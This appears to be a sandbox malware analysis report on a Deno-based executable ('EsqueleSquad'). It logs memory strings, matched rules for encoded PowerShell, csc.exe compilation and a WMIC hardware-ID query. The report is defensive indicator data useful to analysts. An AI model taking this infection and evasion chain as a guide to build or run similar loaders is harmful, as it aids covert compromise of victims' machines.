      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://url.spec.whatwg.org/#port-state
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://w3c.github.io/FileAPI/
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://w3c.github.io/permissions/#permission-descriptor
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://w3c.github.io/permissions/#permission-registry
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://w3c.github.io/permissions/#permissionstatus
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://w3c.github.io/permissions/#status-of-a-permission
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://w3c.github.io/user-timing)
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://wicg.github.io/import-maps/
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357438412.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2358901034.000001638FCE4000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355062459.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354104881.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2359924565.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.catcert.net/verarrel
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://www.npmjs.com/package/tslib).
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rapidtables.com/convert/color/hsl-to-rgb.html
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49214
      Source: unknown | Network traffic detected: HTTP traffic on port 49214 -> 443

      System Summary

      Source: Process Memory Space: powershell.exe PID: 5652, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | File created: C:\WindowsTasks
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | File created: C:\WindowsTasks\Updates
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | File created: C:\WindowsTasks\Platform
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF848E859C4
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF848E8D77C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF848E8D805
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2047145702.00007FF67770C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameEsqueleSquad.exeD vs dGhlYXB0Z3JvdXA=-free.exe
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: originalTextSpanoriginalFileNamecontextSpanoriginalContextSpanprefixTextsuffixTextstruct RenameLocationstruct RenameLocation with 8 elements vs dGhlYXB0Z3JvdXA=-free.exe
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: originalTextSpanoriginalFileNamecontextSpanoriginalContextSpanprefixTextsuffixTextstruct RenameLocationstruct RenameLocation with 8 elements_ vs dGhlYXB0Z3JvdXA=-free.exe
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | Process created: Commandline size = 3421
      Source: Process Memory Space: powershell.exe PID: 5652, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 764, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engine | Classification label: mal72.expl.evad.winEXE@16/18@2/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzdhsljb.hpa.ps1
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | Memory string: rustls::msgs::handshakeIllegal SNI hostname received
      Source: dGhlYXB0Z3JvdXA=-free.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: deno test src/v8-flags-help
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: Multi-address mappings are not yet supported
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | File read: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe
      Source: unknown | Process created: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe "C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe"
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP"
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP"
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /value
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Virtual size of .text is bigger than: 0x100000
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Image base 0x140000000 > 0x60000000
      Source: dGhlYXB0Z3JvdXA=-free.exe Static file information: File size 34433319 > 1048576
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x155e800
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9fb200
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdbhP source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: *on.pdb; source: powershell.exe, 00000003.00000002.2264583068.00000254D0FFE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb28 source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb9 source: powershell.exe, 00000003.00000002.2265232590.00000254D12D0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2327769536.000001C3F3122000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbt source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdb source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdb source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: tion.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ystem.Core.pdb.# source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdbhP source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000007.00000002.2327416942.000001C3F30DE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: re.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
